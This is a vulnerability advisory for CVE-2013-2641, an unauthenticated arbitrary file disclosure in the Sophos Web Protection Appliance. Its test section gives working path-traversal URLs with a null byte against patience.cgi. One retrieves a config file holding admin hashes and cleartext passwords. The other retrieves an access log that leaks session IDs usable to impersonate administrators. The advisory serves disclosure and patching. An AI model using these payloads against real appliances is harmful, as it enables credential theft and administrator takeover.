Published: 2013-04-03
Updated: 2013-04-08
Affected systems:
Sophos Web Protection Appliance
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58833
CVE(CAN) ID: CVE-2013-2641
Sophos Web Security and Control blocks malware, spyware, phishing, anonymous proxies and other rogue programs in web traffic at the gateway.
Web Protection Appliance 3.7.8.2 and earlier contain an arbitrary file disclosure vulnerability; an attacker can exploit it to disclose arbitrary files within the appliance's context.
<*Source: Wolfgang Ettlinger*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file
containing the salted hash of the administrator password as well as clear text
passwords e.g. for FTP backup storage or Active Directory authentication:
https://www.example.com/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00
Furthermore, the Apache access log can be retrieved. As PHP session IDs are
passed via the URL rather than via cookies, these can be found in this log
file and effectively used to impersonate administrator users:
https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00
An excerpt from the log file shows that it contains PHP session ID information
(parameter "STYLE").
<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139
"https://www.example.com/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Sophos
------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page: